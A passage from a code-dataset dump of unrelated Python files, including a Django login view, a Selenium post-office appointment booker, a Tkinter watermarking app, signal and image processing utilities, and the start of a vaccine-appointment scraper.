else:\n raise Exception(f'Invalid simple constraint: {instance}')\n\n print(f'MODEL DICT - after: {[(name, value.name) for name, value in model.dict_references.items()]}')\n\n return model","repo_name":"CAOSD-group/rhea","sub_path":"rhea-backend/rhea/refactorings/elimination_any_constraint.py","file_name":"elimination_any_constraint.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37833710217","text":"from django.views.generic import FormView\nfrom django_hosts.resolvers import reverse\nfrom .forms import EmployeeLoginForm\nfrom django.shortcuts import HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\n\nclass EmployeeLoginView(FormView):\n template_name = 'account/employee_login.html'\n form_class = EmployeeLoginForm\n response_message = ''\n\n def dispatch(self, *args, **kwargs):\n if self.request.user.is_authenticated():\n return HttpResponseRedirect(reverse('landing_page_backend', host='backend'))\n else:\n return super(EmployeeLoginView, self).dispatch(*args, **kwargs)\n\n def post(self, request):\n form = EmployeeLoginForm(self.request.POST)\n succesLoginFlag = False\n\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'], password=cd['password'])\n if user is not None:\n if not user.is_active:\n self.response_message = 'Your account is not active.'\n elif not user.is_employee:\n self.response_message = 'You don\\'t have permission to acces this site'\n else:\n succesLoginFlag = True \n else:\n self.response_message = 'Wrong username or password'\n\n if succesLoginFlag:\n login(self.request, user)\n return HttpResponseRedirect(reverse('landing_page_backend', host='backend'))\n else:\n return self.form_invalid(form)\n\n def get_context_data(self, **kwargs):\n context = super(EmployeeLoginView, self).get_context_data(**kwargs)\n context['response_message'] = self.response_message\n return context\n\ndef EmployeeLogut(request):\n logout(request)\n return HttpResponseRedirect(reverse('login_backend', host='backend'))","repo_name":"Michael-Wisniewski/fitness-club","sub_path":"fitness_club/src/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70961988571","text":"import os,json\n\nclass Leaderboard:\n def __init__(self):\n self.saveFilePath = os.path.join(os.getcwd(),'src','PythonGame','gameData.json')\n self.users = \"\"\n self.sortedScoreboard = []\n self.getUser()\n \n def getUser(self):\n try:\n data = json.load(open(self.saveFilePath))\n self.users = data\n except:\n pass\n \n def saveScore(self,newData):\n try:\n #Append to at the end\n data = json.load(open(self.saveFilePath))\n \n if type(data) is dict:\n data = [data]\n \n data.append({\n \"name\": newData[\"name\"],\n \"score\": newData[\"score\"]\n })\n \n with open(self.saveFilePath, 'w') as outfile:\n json.dump(data, outfile, indent=4)\n \n self.users = data\n \n except Exception as e:\n #When file data is not found\n print(e)\n json_object = json.dumps(newData, indent=4)\n with open(self.saveFilePath, \"w\") as outfile:\n outfile.write(json_object)\n \n\n def getSortedScoreboard(self):\n self.getUser()\n tempArr = []\n sortedArrDict = []\n userList = []\n if len(self.users) == 2:\n if type(self.users) is list:\n for data in self.users:\n tempArr.append(data['score'])\n else:\n tempArr.append(self.users[\"score\"])\n else:\n for data in self.users:\n tempArr.append(data['score'])\n \n sortedArr = self.quickSort(tempArr)\n if len(self.users) == 2:\n \n \n if type(self.users) is list:\n userList = self.users\n else:\n userList.append(self.users)\n else:\n userList = self.users\n index = 1\n while sortedArr:\n val = sortedArr.pop()\n for item in userList:\n if val == item['score']:\n sortedArrDict.append({\n 'name' : item['name'],\n 'score': item['score'],\n 'position': index\n })\n index += 1\n userList.remove(item)\n break\n self.sortedScoreboard = sortedArrDict\n return sortedArrDict\n \n def findPlayer(self,playerName):\n \"\"\"Find player in array by using linear search\"\"\"\n self.getSortedScoreboard()\n playerArr = []\n for player in self.sortedScoreboard:\n if playerName.lower() in player[\"name\"].lower():\n playerArr.append({\n \"name\": player[\"name\"],\n \"score\": player[\"score\"],\n \"position\": player[\"position\"]\n })\n return playerArr\n \n def quickSort(self,array):\n \"\"\"Sort the array by using quicksort.\"\"\"\n less = []\n equal = []\n greater = []\n\n if len(array) > 1:\n pivot = array[0]\n for x in array:\n if x < pivot:\n less.append(x)\n elif x == pivot:\n equal.append(x)\n elif x > pivot:\n greater.append(x)\n return self.quickSort(less) + equal + self.quickSort(greater)\n else:\n return array\n","repo_name":"Chissanu/UWU-Re","sub_path":"src/PythonGame/Classes/Leaderboard.py","file_name":"Leaderboard.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"42425462121","text":"import csv\nimport sys\nimport getopt\nimport numpy as np\nfrom datetime import datetime\ntry:\n from matplotlib import pyplot as plt\nexcept Exception:\n import matplotlib\n matplotlib.use('pdf')\n from matplotlib import pyplot as plt\n\n\ndef save_plot(ax, name='plot', const_temp=False):\n with open('costs.txt', 'r') as cost_file:\n cost = int(cost_file.read())\n plt.title('Final cost: {0}'.format(cost))\n if not const_temp:\n ax.set_xscale('log')\n plt.xlabel('Temperature')\n else:\n plt.xlabel('Algorithm pass no.')\n dt = datetime.now().strftime('%H-%M-%S')\n plt.ylabel('Cost')\n plt.savefig('out/{0}_{1}.pdf'.format(name, dt))\n\n\ndef plot_simul_annealing(const_temp=False):\n temp_array = []\n pos_array = []\n with open('cooling.csv', 'r', newline='') as cooling_file:\n reader = csv.reader(cooling_file, delimiter=';')\n for row in reader:\n temp_array.append(float(row[0]))\n pos_array.append(int(row[1]))\n\n ax = plt.axes()\n\n if const_temp:\n ax.plot(np.arange(len(pos_array)), pos_array, ',')\n else:\n ax.plot(temp_array, pos_array, ',')\n ax.invert_xaxis()\n\n save_plot(ax, 'temp_pos', const_temp)\n\n\ndef main(argv):\n const_temp = False\n try:\n opts, args = getopt.getopt(argv, 't')\n except getopt.GetoptError:\n exit()\n for opt, arg in opts:\n if opt == '-t':\n const_temp = True\n\n plot_simul_annealing(const_temp)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"sewera/aisde-lab6","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37354362893","text":"import time\nfrom selenium import webdriver\n# Selenium custom exception that gets raised when an element cannot be found\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nzeut_number = ZEUT_NUMBER\nphone_number = PHONE_NUMBER\n\n# If you don't know the id number of the post office branch, you can check it here,\n# The id number is the number next to the name\n# post_office_list_to_check_the_branch_number_id_url='https://israelpost.co.il/%D7%A9%D7%99%D7%A8%D7%95%D7%AA%D7%99%D7%9D/%D7%90%D7%99%D7%AA%D7%95%D7%A8-%D7%A1%D7%A0%D7%99%D7%A4%D7%99%D7%9D-%D7%95%D7%96%D7%99%D7%9E%D7%95%D7%9F-%D7%AA%D7%95%D7%A8-%D7%91%D7%A7%D7%9C%D7%99%D7%A7/'\n# print(post_office_list_to_check_the_branch_number_id_url)\n\npost_office_index = \"705\"\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n\nurl = f\"https://israelpost.co.il/%D7%A9%D7%99%D7%A8%D7%95%D7%AA%D7%99%D7%9D/%D7%90%D7%99%D7%AA%D7%95%D7%A8-%D7%A1%D7%A0%D7%99%D7%A4%D7%99%D7%9D-%D7%95%D7%96%D7%99%D7%9E%D7%95%D7%9F-%D7%AA%D7%95%D7%A8-%D7%91%D7%A7%D7%9C%D7%99%D7%A7/%D7%A1%D7%A0%D7%99%D7%A3/?no={post_office_index}\"\ndriver.get(url)\n\n# address_post_office = driver.find_element(By.ID, \"branchaddress\").text\n# name_post_office_id = driver.find_element(By.CSS_SELECTOR, \".form-title.R.branchname\").text\n\n# next 2 lines wait until the element is available or 5 sec or until get appointment is clickable.\n# and then wait for 1 sec before clicking on it ( to avoid being mark as a bot.\nwait = WebDriverWait(driver, 8)\nget_appointment = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.btn.btn-primary.apptButton')))\ntime.sleep(1)\n\n# get_appointment.send_keys(Keys.ENTER)\nActionChains(driver).move_to_element(get_appointment).click(on_element=get_appointment).perform()\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~next window- stage 1~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Choose the service type ( there is only one option)\n# wait for up to 5 seconds for an element matching the given criteria to be found and the button is clickable\nwait = WebDriverWait(driver, 10)\ntime.sleep(1.2)\n\n# here there is difference between post office id=325 and id 705\nchoose_service_type = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, \".serviceIcon1\")))\nActionChains(driver).move_to_element(get_appointment).click(on_element=choose_service_type).perform()\ntime.sleep(1)\ncontinue_to_next_page = driver.find_element(By.CSS_SELECTOR, \".btn-ok.pull-left.btn-primary.btn\")\nActionChains(driver).move_to_element(continue_to_next_page).click(on_element=continue_to_next_page).perform()\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~next window- stage 2- done manualy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'''This part it done manually by the main user '''\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~next page- 3rd stage~~~~~~~~~~~~~~~~~~~~~~~\n\n# we are continued to the 3rd step of the process\n# wait until the element is clickable or 90 seconds (time to fill the appointment time)\ntelephone_number1 = WebDriverWait(driver, 90).until(EC.element_to_be_clickable((By.ID, 'userTelephone')))\nActionChains(driver).move_to_element(telephone_number1).click().send_keys(phone_number).perform()\n\ntime.sleep(1)\n# inserting the phone number ones again:\ntelephone_number2 = driver.find_element(By.ID, \"userTelephoneConfirmation\")\nActionChains(driver).move_to_element(telephone_number2).click().send_keys(phone_number).perform()\n\ntelephone_continue = driver.find_element(By.ID, \"nextstage\")\nActionChains(driver).move_to_element(telephone_continue).click().perform()\n\ntime.sleep(20)\ndriver.quit()\n","repo_name":"kerendre/post_office_appointment_booker","sub_path":"order_post_office_appointment.py","file_name":"order_post_office_appointment.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22336964356","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nimport cv2\nimport torch\n\ndef averaged_hausdorff_distance(set1, set2, max_ahd=np.inf):\n \"\"\"\n Compute the Averaged Hausdorff Distance function\n between two unordered sets of points (the function is symmetric).\n Batches are not supported, so squeeze your inputs first!\n :param set1: Array/list where each row/element is an N-dimensional point.\n :param set2: Array/list where each row/element is an N-dimensional point.\n :param max_ahd: Maximum AHD possible to return if any set is empty. Default: inf.\n :return: The Averaged Hausdorff Distance between set1 and set2.\n \"\"\"\n\n if len(set1) == 0 or len(set2) == 0:\n return max_ahd\n\n set1 = np.array(set1)\n set2 = np.array(set2)\n\n assert set1.ndim == 2, 'got %s' % set1.ndim\n assert set2.ndim == 2, 'got %s' % set2.ndim\n\n assert set1.shape[1] == set2.shape[1], \\\n 'The points in both sets must have the same number of dimensions, got %s and %s.'\\\n % (set2.shape[1], set2.shape[1])\n\n d2_matrix = pairwise_distances(set1, set2, metric='euclidean')\n\n res = np.average(np.min(d2_matrix, axis=0)) + \\\n np.average(np.min(d2_matrix, axis=1))\n\n return res\n\n\"\"\"\npred, target : probability numpy mask\n(num_classes+1, H, W)\nreturn [class 1_iou,,,, class n_iou]\n\"\"\"\ndef calculate_iou(pred,target,num_classes):\n\n #pred_mask = np.argmax(pred,axis=0)\n #target_mask = np.argmax(target,axis=0)\n iou_list = []\n for i in range(0,num_classes):\n iou_score = (torch.sum((pred[i]==True)&(target[i]==True))+ 1e-6) /(torch.sum((pred[i]==True)|(target[i]==True))+ 1e-6)\n iou_list.append(iou_score)\n \n return iou_list\n \n\"\"\"\n\n\"\"\"\ndef compute_mean_iou(pred, label):\n\n unique_labels = np.unique(label)\n num_unique_labels = len(unique_labels);\n\n I = np.zeros(num_unique_labels)\n U = np.zeros(num_unique_labels)\n\n for index, val in enumerate(unique_labels):\n pred_i = pred == val\n label_i = label == val\n\n I[index] = float(np.sum(np.logical_and(label_i, pred_i)))\n U[index] = float(np.sum(np.logical_or(label_i, pred_i)))\n\n\n mean_iou = np.mean(I / U)\n return mean_iou\n\ndef calculate_overlab_contour(img):\n img = img.astype(np.float32)\n imgray = 255 - img*255\n imgray = np.stack([imgray,imgray,imgray],axis=2)\n imgray = cv2.cvtColor(imgray, cv2.COLOR_BGR2GRAY)\n ret, imthres = cv2.threshold(imgray, 127, 255, cv2.THRESH_BINARY_INV)\n\n contour, hi = cv2.findContours(imthres.astype(np.uint8), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n\n contour_mask = np.zeros((256,256))\n for i in contour:\n for k in i:\n contour_mask[tuple(k[0])] = 1\n \n return contour_mask\n\n\"\"\"\nBoundary IOU\n(G_d & G) & (P_d & P)\n---------------------\n(G_d & G) | (P_d & P)\nboundary을 기준으로 한 d 필셀 중 boundary 안쪽을 기준으로 사용하겠다\n\"\"\"\n\ndef boundary_iou():\n pass","repo_name":"hyeonminkim0625/angio","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32386164233","text":"#necessary contingencies to run atari and AI\n\nimport gym\n\nimport numpy as np\n\nfrom stable_baselines.common.policies import MlpPolicy\n\nfrom stable_baselines import PPO2\n\nenv = gym.make('SpaceInvaders-v0')\n\ndef evaluate(model, num_episodes=200):\n \"\"\"Evaluate a PPO model.\n\n Args:\n model: (BaseRLModel object) the RL Agent.\n num_episodes: (int) number of time episodes to evaluate the model.\n Returns:\n (float) Mean reward for all the episodes\n \"\"\"\n print(\"Start model evaluation.\")\n all_rewards = []\n\n for i in range(num_episodes):\n obs = env.reset()\n done = False\n episode_reward = 0\n\n while not done:\n action, _ = model.predict(obs)\n obs, reward, done, info = env.step(action)\n episode_reward += reward\n\n print(\"Reward for episode {} is {}.\".format(i+1, episode_reward))\n all_rewards.append(episode_reward)\n\n # Compute mean reward for the `num_episodes` episodes\n mean_reward = round(np.mean(all_rewards))\n print(\"Mean reward:\", mean_reward, \"Num episodes:\", num_episodes)\n return mean_reward\n\nrewards_array = []\n\n#gets the average score of all trials\n\nfor i in range(10):\n\tmodel = PPO2.load(\"ppo_space_invaders_model\" + str(i))\n\taverage_reward = evaluate(model, num_episodes=1)\n\trewards_array.append(average_reward)\n\n\nprint (\"this prints the average reward array things\")\nprint (rewards_array)\n\n\n\n","repo_name":"Better-Call-Paul/Omega.Space.Invaders","sub_path":"Data_Set.py","file_name":"Data_Set.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41032203427","text":"import argparse\n\nimport math\nimport numpy as np\nfrom scipy import signal\nimport scipy.io.wavfile\nimport matplotlib.pyplot as plt\n\n# This function does a mirror extension of the signal x_array\n# It then calculates the output(y) after input(x_array) passes \n# Through the filter(h_filter) \n# After computing the output(y) this function downsamples \n# (y) by a factor of 2\ndef filtdec(x_array, h_filter, downsample): \n \n q = [] \n \n N = len(x_array) \n \n #mirror the array\n for i in range(N-1, -1, -1):\n x_array.append(x_array[i]) \n \n #convolve the signal with filter\n y = scipy.signal.convolve(x_array,h_filter, 'same')\n \n #downsample the array\n for i in range(0 , int(len(y)/2) ):\n q.append(y[2*i])\n return q\n\n\n# This function first upsamples x_array by 2 \n# This function then does a mirror extension of the upsampled signal\n# It then passes the upsampled array through a filter(f)\n# This function returns the output of the filtered signal\ndef upfilt(x_array, h_filter, upsample):\n \n q = []\n \n for i in range(0, 2*len(x_array)):\n if(i%2):\n q.append(x_array[int(i/2)])\n else:\n q.append(0)\n \n y = scipy.signal.convolve(q, h_filter, 'same')\n \n \n return y \n\n\ndef IFT(length):\n \n q = np.zeros(length) \n increment = (2*math.pi)/length \n \n for i in range(0,length): \n v = ((-1/4)*(math.cos(2*i*increment))+((1/2)*math.cos(i*increment))+(3/4)) \n q[i] = v\n \n return q\n\n\ndef main():\n fs, x = scipy.io.wavfile.read(\"beat.wav\") \n \n h1 = [0,1,0]\n h2 = [1,0,1]\n x = []\n for i in range(0,10):\n x.append(i)\n\n x = filtdec(x,h1, 2)\n print(x)\n \n x = upfilt(x, h2, 2)\n print(x)\n \n print(IFT(10))\n \n print('end')\n \nif __name__ == \"__main__\":\n main()\n \n \n \n \n \n \n \n \n \n \n \n '''\n # Parse command-line arguments\n parser = argparse.ArgumentParser(usage=__doc__)\n parser.add_argument(\"--order\", type=int, default=3, help=\"order of Bessel function\")\n parser.add_argument(\"--output\", default=\"plot.png\", help=\"output image file\")\n args = parser.parse_args()\n\n # Compute maximum\n f = lambda x: -special.jv(args.order, x)\n sol = optimize.minimize(f, 1.0)\n\n # Plot\n x = np.linspace(0, 10, 5000)\n #plt.plot(x, special.jv(args.order, x), '-', sol.x, -sol.fun, 'o')\n\n # Produce output\n #plt.savefig(args.output, dpi=96)\n'''\n","repo_name":"Matt-McNichols/perl","sub_path":"DSP/DSP_filters.py","file_name":"DSP_filters.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24591493705","text":"import numpy as np\nimport cv2\n\ndef demosaic_ahd(image):\n height, width = image.shape\n rgb_image = np.zeros((height, width, 3), dtype=np.uint8)\n\n # Create empty channels for Red, Green, and Blue\n red_channel = np.zeros((height, width), dtype=np.float32)\n green_channel = np.zeros((height, width), dtype=np.float32)\n blue_channel = np.zeros((height, width), dtype=np.float32)\n\n # Demosaicing using Adaptive Homogeneity-Directed (AHD)\n for i in range(height):\n for j in range(width):\n if i % 2 == 0 and j % 2 == 0:\n red_channel[i, j] = image[i, j]\n elif i % 2 == 0 and j % 2 != 0:\n green_channel[i, j] = image[i, j]\n elif i % 2 != 0 and j % 2 == 0:\n green_channel[i, j] = image[i, j]\n elif i % 2 != 0 and j % 2 != 0:\n blue_channel[i, j] = image[i, j]\n\n # Interpolate the green channel\n for i in range(height):\n for j in range(width):\n if green_channel[i, j] == 0:\n if i > 1 and i < height - 2 and j > 1 and j < width - 2:\n neighbor_vals = [green_channel[i-1, j], green_channel[i+1, j],\n green_channel[i, j-1], green_channel[i, j+1]]\n neighbor_avg = sum(neighbor_vals) / len(neighbor_vals)\n green_channel[i, j] = neighbor_avg\n\n # Interpolate the red and blue channels\n for i in range(height):\n for j in range(width):\n if red_channel[i, j] == 0:\n if i > 1 and i < height - 2 and j > 1 and j < width - 2:\n red_vals = [red_channel[i-2, j], red_channel[i+2, j],\n red_channel[i, j-2], red_channel[i, j+2]]\n red_avg = sum(red_vals) / len(red_vals)\n red_channel[i, j] = red_avg\n if blue_channel[i, j] == 0:\n if i > 1 and i < height - 2 and j > 1 and j < width - 2:\n blue_vals = [blue_channel[i-2, j], blue_channel[i+2, j],\n blue_channel[i, j-2], blue_channel[i, j+2]]\n blue_avg = sum(blue_vals) / len(blue_vals)\n blue_channel[i, j] = blue_avg\n\n # Normalize the channels to 8-bit unsigned integers\n red_channel = red_channel.astype(np.uint8)\n green_channel = green_channel.astype(np.uint8)\n blue_channel = blue_channel.astype(np.uint8)\n\n # Combine the channels to form the RGB image\n rgb_image[:, :, 0] = red_channel\n rgb_image[:, :, 1] = green_channel\n rgb_image[:, :, 2] = blue_channel\n\n return rgb_image\n\n# Load the single-channel image captured using a CFA\nsingle_channel_image = cv2.imread('input_image2.jpg', cv2.IMREAD_GRAYSCALE)\n\n# Perform demosaicing using bilinear interpolation\ndemosaiced_image = demosaic_ahd(single_channel_image)\n\n\n# Save the resulting RGB image\ncv2.imshow('output', demosaiced_image)\ncv2.imwrite('output.png', demosaiced_image)\ncv2.destroyAllWindows()\n","repo_name":"roblnk/Digital_Image_Processing_GIUAKY_XLAS","sub_path":"bai2/bai2_demosaicing.py","file_name":"bai2_demosaicing.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29838136961","text":"# 前K个高频元素\n# 给定一个非空的整数数组,返回其中出现频率前 k 高的元素。\n# 示例 1:\n# 输入: nums = [1,1,1,2,2,3], k = 2\n# 输出: [1,2]\n#\n# 示例 2:\n# 输入: nums = [1], k = 1\n# 输出: [1]\n# 说明:\n# 你可以假设给定的 k 总是合理的,且 1 ≤ k ≤ 数组中不相同的元素的个数。\n# 你的算法的时间复杂度必须优于 O(n log n) , n 是数组的大小。\n#\n\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n map = {}\n for i in nums:\n map[i] = map.get(i, 0) + 1 # 返回指定键的值,如果值不在字典中返回default值\n # if i in map:\n # map[i] += 1\n # else:\n # map[i] = 1\n return [x[0] for x in sorted(map.items(), key = lambda item : item[1], reverse = True)][:k]\n # res = []\n # tmp = sorted(map.items(), key = lambda item : item[1], reverse = True) # 返回值是一个list,而原字典中的键值对被转换为了list中的元组\n # for i in tmp[:k]:\n # res.append(i[0])\n # return res\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.topKFrequent([1,1,1,2,2,3], 2))\n\n # t = [('a',1), ('b',2), ('c',3)]\n # print(t[2][1])\n","repo_name":"EricaEmmm/CodePython","sub_path":"LeetCode/Q347_HM_TopKFrequentElements.py","file_name":"Q347_HM_TopKFrequentElements.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26195374106","text":"#Making Monsters to fight\n\nimport random\nimport itemCreation as ic\n\n\n\nclass Monster(object):\n\n def __init__(self, level, mob_class, element):\n self.level = level\n self.mob_class = mob_class\n self.element = element \n self.health = self.level * 2 #place holder number\n # experience = self.level + 100\n # item_drop = ic.random_item(level)\n\n\nclass Boss(object):\n\n def __init__(self, level, mob_class, element):\n self.level = level\n self.mob_class = mob_class\n self.element = element \n self.health = self.level * 3 #place holder number\n # experience = self.level *1.5\n # item_drop = ic.random_item(self)\n","repo_name":"Connor-Hayden-Game/Game","sub_path":"GameFiles/mobs.py","file_name":"mobs.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71150852890","text":"# A watermarking GUI app utilizing classes\n\nfrom tkinter import Entry, Tk, Button, filedialog, Label, StringVar, messagebox\nfrom PIL import ImageTk, Image, ImageDraw, ImageFont\nimport copy\n\nWINDOW_WIDTH = 1000\nWINDOW_HEIGHT = 500\nWM_FONT_SIZE = 30\n\n\nclass Watermarker(Tk):\n def __init__(self):\n Tk.__init__(self)\n self.watermark = StringVar()\n self.title('Simple Watermarking App')\n self.geometry(f'{WINDOW_WIDTH}x{WINDOW_HEIGHT}')\n # Open Image\n open_button = Button(text=\"Open Image\", command=self.open_image)\n open_button.place(width=120, relx=0.5, x=-260, rely=1, y=-25)\n # Watermark entry\n wm_entry = Entry(0, textvariable=self.watermark)\n wm_entry.insert(0, 'Watermark Text')\n wm_entry.place(width=120, relx=0.5, x=-125, rely=1, y=-22)\n # Preview button\n preview_button = Button(text='Preview Watermark',\n command=self.make_watermark)\n preview_button.place(width=120, relx=0.5, x=5, rely=1, y=-25)\n # Save button\n save_button = Button(text='Save Image', command=self.save_image)\n save_button.place(width=120, relx=0.5, x=140, rely=1, y=-25)\n\n def open_image(self):\n try:\n self.img_panel.destroy()\n except AttributeError:\n pass\n self.filename = self.openfilename()\n self.photo = Photo(Image.open(self.filename))\n preview_image = ImageTk.PhotoImage(self.photo.img_small)\n self.img_panel = Label(image=preview_image)\n self.img_panel.image = preview_image\n self.img_panel.place(relwidth=1.0)\n\n def openfilename(self):\n # Open file dialog box to select image\n filename = filedialog.askopenfilename(initialdir='%USERPROFILE%',\n title='Select an Image.',\n filetypes=[('Image files',\n '*.jpg *.jpeg *.png'),\n ('All files', '*.*')])\n return filename\n\n def make_watermark(self):\n self.img_panel.destroy()\n watermark = self.watermark.get()\n # Create working copy of image for preview\n preview_wm_img = copy.copy(self.photo.img_small).convert('RGBA')\n txt = Image.new('RGBA', preview_wm_img.size, (255, 255, 255, 0))\n wm_font = ImageFont.truetype('./open-sans.extrabold.ttf', WM_FONT_SIZE)\n d = ImageDraw.Draw(txt)\n # Find preview image center for text\n img_width, img_height = preview_wm_img.size\n d.text((img_width-10, img_height-10), watermark,\n font=wm_font, anchor='rs', fill=(0, 0, 0, 50))\n combined_img = Image.alpha_composite(preview_wm_img, txt)\n preview_image = ImageTk.PhotoImage(combined_img)\n self.img_panel = Label(image=preview_image)\n self.img_panel.image = preview_image\n self.img_panel.place(relwidth=1.0)\n self.watermark1 = watermark\n\n def save_image(self):\n final_img = self.photo.img.convert('RGBA')\n txt = Image.new('RGBA', final_img.size, (255, 255, 255, 0))\n wm_font = ImageFont.truetype('./open-sans.extrabold.ttf',\n int(WM_FONT_SIZE/self.photo.img_scale))\n d = ImageDraw.Draw(txt)\n img_width, img_height = self.photo.img.size\n d.text((img_width-int(10/self.photo.img_scale),\n img_height-int(10/self.photo.img_scale)), self.watermark1,\n font=wm_font, anchor='rs', fill=(0, 0, 0, 50))\n combined_img = Image.alpha_composite(final_img, txt)\n # combined_img.show()\n # Find the file extension to separate and add \"_watermark\" to name\n end_count = 1\n for char in reversed(self.filename):\n if char == '.':\n break\n end_count += 1\n filename = self.filename[:-end_count]\n extension = self.filename[-end_count:]\n new_filename = f\"{filename}_watermark{extension}\"\n # Save file after converting back to RGB (needed for jpeg files)\n combined_img.convert('RGB').save(new_filename)\n # Find first '/' to show user new filename in pop window.\n end_count = 0\n for char in reversed(new_filename):\n if char == '/':\n break\n end_count += 1\n messagebox.showinfo(\"Watermark App\",\n f\"Image saved as\\n{new_filename[-end_count:]}\")\n\n\nclass Photo:\n def __init__(self, img):\n self.img = img\n self.width, self.height = img.size\n self.img_small = self.resize()\n\n def resize(self):\n img_scale = self.find_scale()\n new_width = self.width * img_scale\n new_height = self.height * img_scale\n return self.img.resize((int(new_width), int(new_height)),\n Image.ANTIALIAS)\n\n def find_scale(self):\n self.img_scale = (WINDOW_WIDTH - 50) / self.width\n if self.img_scale * self.height > WINDOW_HEIGHT - 30:\n self.img_scale = (WINDOW_HEIGHT - 30) / self.height\n return self.img_scale\n\n\napp = Watermarker()\napp.mainloop()\n","repo_name":"baumertjohn/WatermarkApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19622598333","text":"#!/usr/bin/python3\n\"\"\"\nPython script that uses the GitHub API to display your GitHub user ID.\n\"\"\"\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n username = sys.argv[1]\n pat = sys.argv[2]\n\n # Create a Basic Authentication string using your PAT as the password\n auth = (username, pat)\n\n # Define the GitHub API endpoint for user information\n url = 'https://api.github.com/user'\n\n try:\n # Send a GET request to the GitHub API with Basic Authentication\n response = requests.get(url, auth=auth)\n data = response.json()\n\n if 'id' in data:\n print(data['id'])\n else:\n print(\"None\")\n except requests.exceptions.RequestException as e:\n print(\"None\")\n else:\n print(\"None\")\n","repo_name":"Suitret/alx-higher_level_programming","sub_path":"0x11-python-network_1/10-my_github.py","file_name":"10-my_github.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39599641335","text":"import json\nimport time\nimport logging\nimport os\nfrom typing import Dict, Iterator, Optional\nimport httpx\nimport requests\nfrom scraper.circuit_breaker import ShortCircuit\nfrom scraper.creneaux.creneau import Creneau, Lieu, Plateforme, PasDeCreneau\nfrom scraper.pattern.vaccine import get_vaccine_name\nfrom scraper.pattern.scraper_request import ScraperRequest\nfrom scraper.profiler import Profiling\nfrom utils.vmd_config import get_conf_platform, get_config, get_conf_outputs\nfrom scraper.error import Blocked403\nfrom utils.vmd_utils import DummyQueue, append_date_days\nfrom typing import Dict, Iterator, List, Optional\nimport dateutil\nfrom cachecontrol import CacheControl\nfrom cachecontrol.caches.file_cache import FileCache\n\n\nPLATFORM = \"mesoigner\"\n\nPLATFORM_CONF = get_conf_platform(\"mesoigner\")\nPLATFORM_ENABLED = PLATFORM_CONF.get(\"enabled\", False)\nMESOIGNER_HEADERS = {\n \"Authorization\": f'Mesoigner apikey=\"{os.environ.get(\"MESOIGNER_API_KEY\", \"\")}\"',\n}\nMESOIGNER_APIs = PLATFORM_CONF.get(\"api\", \"\")\n\nSCRAPER_CONF = PLATFORM_CONF.get(\"center_scraper\", {})\nCENTER_LIST_URL = PLATFORM_CONF.get(\"api\", {}).get(\"center_list\", {})\n\nBOOSTER_VACCINES = get_config().get(\"vaccines_allowed_for_booster\", [])\nBOOSTER_ONLY_VACCINES = get_config().get(\"vaccines_for_booster_only\", [])\n\n\ntimeout = httpx.Timeout(PLATFORM_CONF.get(\"timeout\", 30), connect=PLATFORM_CONF.get(\"timeout\", 30))\n\nif os.getenv(\"WITH_TOR\", \"no\") == \"yes\":\n session = requests.Session()\n session.proxies = { # type: ignore\n \"http\": 